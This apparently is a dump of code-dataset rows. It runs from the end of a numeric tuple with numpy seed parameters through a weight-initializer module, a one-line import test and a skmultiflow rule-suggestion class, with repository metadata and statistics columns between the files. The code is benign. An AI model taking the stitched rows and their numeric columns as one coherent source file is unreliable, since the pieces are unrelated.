(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 127
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 128
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 129
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 130
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 131
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 132
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 133
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 134
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 135
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 136
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 137
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 138
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 139
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 140
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 141
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 142
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 143
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 144
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 145
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 146
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 147
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 148
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 149
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 150
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 151
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 152
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 153
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 154
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 155
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 156
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 157
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 158
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 159
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 160
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 161
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 162
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 163
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 164
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 165
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 166
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 167
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 168
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 169
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 170
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 171
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 172
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 173
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 174
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 175
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 176
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 177
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 178
(0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1, 0, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 0.07692307692307693, 1), # 179
)
"""
parameters for reproducibiliy. More information: https://numpy.org/doc/stable/reference/random/parallel.html
"""
#initial entropy
entropy = 8991598675325360468762009371570610170
#index for seed sequence child
child_seed_index = (
1, # 0
18, # 1
)
| 278.986096 | 492 | 0.771809 | 32,987 | 260,852 | 6.102919 | 0.227423 | 0.354068 | 0.339763 | 0.643761 | 0.367485 | 0.360625 | 0.359751 | 0.359493 | 0.359493 | 0.359493 | 0 | 0.85143 | 0.09482 | 260,852 | 934 | 493 | 279.284797 | 0.001182 | 0.015377 | 0 | 0.200873 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.005459 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
07e2d500a3c14d5b27e2a31a74185473841ac4b4 | 397 | py | Python | lab4/inits.py | GustavHenning/DeepLearning18 | 9489208a41822a41ff87af19dac9f06ad30ac3ea | [
"MIT"
] | null | null | null | lab4/inits.py | GustavHenning/DeepLearning18 | 9489208a41822a41ff87af19dac9f06ad30ac3ea | [
"MIT"
] | null | null | null | lab4/inits.py | GustavHenning/DeepLearning18 | 9489208a41822a41ff87af19dac9f06ad30ac3ea | [
"MIT"
] | null | null | null | import sys
import numpy as np
class Initializer:
def from_shape(self, shape):
print("Initializer is an interface.")
sys.exit(1)
pass
class Zeros(Initializer):
def from_shape(self, shape):
return np.zeros(shape, dtype=float)
class Xavier(Initializer):
def from_shape(self, shape):
return np.random.normal(0, np.sqrt(2 / (sum(shape))), shape)
| 22.055556 | 68 | 0.652393 | 55 | 397 | 4.654545 | 0.527273 | 0.164063 | 0.210938 | 0.269531 | 0.4375 | 0.4375 | 0.3125 | 0.3125 | 0 | 0 | 0 | 0.009836 | 0.231738 | 397 | 17 | 69 | 23.352941 | 0.829508 | 0 | 0 | 0.230769 | 0 | 0 | 0.070529 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.230769 | false | 0.076923 | 0.153846 | 0.153846 | 0.769231 | 0.076923 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 6 |
6af4bc0a0246e69913f87ed27bc81d0a0782ef65 | 61 | py | Python | spacetx_hca_flattener/test/test_import.py | spacetx/spacetx-hca-flattener | a75d6748a133498b2bcd93009888237754a5af7b | [
"MIT"
] | null | null | null | spacetx_hca_flattener/test/test_import.py | spacetx/spacetx-hca-flattener | a75d6748a133498b2bcd93009888237754a5af7b | [
"MIT"
] | null | null | null | spacetx_hca_flattener/test/test_import.py | spacetx/spacetx-hca-flattener | a75d6748a133498b2bcd93009888237754a5af7b | [
"MIT"
] | null | null | null | def test_import():
import spacetx_hca_flattener # noqa
| 20.333333 | 41 | 0.737705 | 8 | 61 | 5.25 | 0.875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.196721 | 61 | 2 | 42 | 30.5 | 0.857143 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 1 | 0 | 1.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ed146d135430f0711947398a4a62add689c3be98 | 538 | py | Python | src/skmultiflow/rules/attribute_expand_suggestion.py | lambertsbennett/scikit-multiflow | bc714fd5ee4f0a486adc00ec6ae39eafa64f81cc | [
"BSD-3-Clause"
] | 1 | 2020-04-16T10:17:03.000Z | 2020-04-16T10:17:03.000Z | src/skmultiflow/rules/attribute_expand_suggestion.py | lambertsbennett/scikit-multiflow | bc714fd5ee4f0a486adc00ec6ae39eafa64f81cc | [
"BSD-3-Clause"
] | null | null | null | src/skmultiflow/rules/attribute_expand_suggestion.py | lambertsbennett/scikit-multiflow | bc714fd5ee4f0a486adc00ec6ae39eafa64f81cc | [
"BSD-3-Clause"
] | 1 | 2019-09-26T02:49:25.000Z | 2019-09-26T02:49:25.000Z | class AttributeExpandSuggestion(object):
def __init__(self, att_idx, att_val, operator, resulting_class_distributions, merit):
self.resulting_class_distributions = resulting_class_distributions
self.merit = merit
self.att_idx = att_idx
self.att_val = att_val
self.operator = operator
